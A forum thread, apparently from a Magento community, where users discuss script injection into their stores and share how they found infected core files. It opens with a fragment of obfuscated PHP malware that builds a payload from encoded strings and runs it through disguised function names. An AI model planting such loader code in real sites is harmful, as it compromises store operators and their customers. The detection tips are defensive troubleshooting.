XAfo.="\145\100";$rUUXAfo=$BcKxNeHlLm($rUUXAfo);@$wTGBOhd1Y($rUUXAfo);};/* ...

2 REPLIES 2

Re: Script injection below body tag in Magento 2.4.1

Hi, you find where was the problem? I have the same problem in magento 1.9.x

Re: Script injection below body tag in Magento 2.4.1

Search on your server with ssh
i have founded 3 files infected

 

grep -rni "CURLOPT_RETURNTRANSFER" ./*

i have founded ./app/code/core/Mage/Core/Model/App.php:416: curl_setopt($hethajok, CURLOPT_RETURNTRANSFER, true);

 

hethajok is not a variable of magento..

 

check:

app/mage.php

app/code/core/Mage/Core/Model/App.php